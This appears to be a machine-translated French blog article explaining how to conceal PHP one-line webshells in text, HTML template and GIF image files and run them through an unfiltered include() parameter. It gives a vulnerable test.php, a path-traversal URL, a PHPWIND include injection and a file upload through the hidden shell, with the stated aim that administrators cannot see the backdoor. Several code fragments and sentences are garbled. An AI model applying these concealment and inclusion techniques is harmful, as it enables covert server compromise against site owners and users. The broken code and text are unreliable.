Récemment, de nombreux amis m'ont demandé si je pouvais masquer mon cheval de Troie d'une phrase dans du HTML ou des images. En fait, l'insertion d'un cheval de Troie d'une phrase dans des fichiers PHP est déjà très cachée. Si j'insiste pour le mettre dans des fichiers HTML ou des images. Continuons la lecture de ce rapport de test. Vous devez savoir que si vous placez simplement l'instruction PHP dans l'image, elle ne sera pas exécutée de toute façon, car PHP n'analyse que les fichiers avec l'extension php. Il faut donc pouvoir exécuter les instructions PHP cachées dans l'image. Nous utilisons simplement les fonctions appelantes en PHP : include, require, etc.
On se souvient encore de l'article sur la dissimulation des chevaux de Troie dans les images d'il y a quelques jours. Autrement dit, utilisez des instructions telles que include("x.gif") dans le fichier PHP pour appeler les instructions du cheval de Troie cachées dans l'image. Les déclarations dans ASP sont similaires. Cela semble très caché, mais si vous appelez directement l'image, il ne sera pas difficile pour quelqu'un qui connaît un peu PHP de trouver quelque chose de suspect. Puisqu'il est difficile de transmettre des paramètres à l'aide de la méthode GET dans l'URL, les performances de l'insertion du cheval de Troie ne peuvent pas être pleinement exploitées.
La fonction Include est fréquemment utilisée en PHP, elle pose donc trop de problèmes de sécurité. Par exemple, la vulnérabilité de PHPWIND1.36 est causée par le manque de filtrage des variables derrière l'inclusion. À partir de là, nous pouvons construire des instructions similaires à insérer dans des fichiers PHP. Cachez ensuite le cheval de Troie dans une image ou un fichier HTML, qui peut être considéré comme plus dissimulé. Par exemple, insérez la déclaration suivante dans le forum PHPWIND : < ''?@include includ/.$PHPWIND_ROOT;? >Les administrateurs généraux ne peuvent pas la voir.
Avec l'aide de la fonction include, nous pouvons masquer les chevaux de Troie PHP dans de nombreux types de fichiers tels que les fichiers txt, html et image. Étant donné que ces trois types de fichiers, fichiers txt, html et image, sont les plus courants dans les forums et les systèmes d'articles, nous effectuerons les tests dans l'ordre ci-dessous.
Créez d'abord un fichier PHP test.php. Le contenu du fichier est :
$test=$_GET['test'];
@include 'test/'.$test
?>
Les fichiers txt sont généralement des fichiers de description, nous mettons donc le fichier
PHP test.php.Cheval de Troie en une phrase Vous pouvez accéder au fichier de description du répertoire. Créez simplement un fichier TXT t.txt. Nous collons le cheval de Troie d'une phrase dans le fichier t.txt. Ensuite, visitez http://localhost/test/test.php?test=../t.txt. Si vous voyez le contenu de t.txt, c'est OK. Ajoutez ensuite l'adresse du cheval de Troie du client de porte dérobée PHP lanker à http Just. ajoutez cmd au mot de passe de ://localhost/test/test.php?test=../t.txt , et vous pourrez voir les résultats renvoyés par l'exécution.
Pour les fichiers HTML, il s'agit généralement de fichiers modèles. Afin de permettre au cheval de Troie inséré dans le fichier HTML d'être appelé et exécuté sans être affiché, nous pouvons ajouter une zone de texte avec des attributs cachés dans le HTML, tels que : Utilisez ensuite la même méthode que ci-dessus. Les résultats de l'exécution peuvent généralement être vus en visualisant le fichier source. Par exemple, utilisez la fonction de visualisation du répertoire de ce programme. En affichant le contenu du fichier source, je peux obtenir le répertoire sous la forme C:Uniserver2_7swwwtest.
Parlons maintenant des fichiers image. L’astuce la plus toxique consiste à cacher le cheval de Troie dans l’image. Nous pouvons directement modifier une image et l'insérer à la fin de l'image.
Après test, cela n'affectera généralement pas l'image. Ajoutez ensuite l'adresse du cheval de Troie client de la même manière
et nous vérifions les variables d'environnement PHP. Le résultat renvoyé est l'image originale.
Il peut y avoir quelques différences entre les résultats ici et ce que nous avons imaginé. En fait, la commande a été exécutée, mais les résultats renvoyés ne sont pas visibles. Comme il s'agit d'un vrai fichier GIF, les résultats renvoyés ne seront pas affichés. prouver s'il est réellement exécuté. Après avoir reçu la commande, nous exécutons la commande de téléchargement de fichier. Comme prévu, le fichier a été téléchargé avec succès sur le serveur. L’avantage d’une telle contrefaçon est qu’elle est bien dissimulée. Inutile de dire que l’inconvénient est qu’il n’y a pas de réponse. Si vous souhaitez voir les résultats renvoyés, retirez le Bloc-notes et créez un faux fichier image.
À ce stade, le test est pratiquement terminé. La manière de masquer la porte dérobée PHP dépend de votre propre choix. L'écriture est précipitée, s'il y a quelque chose qui ne va pas, merci de le signaler !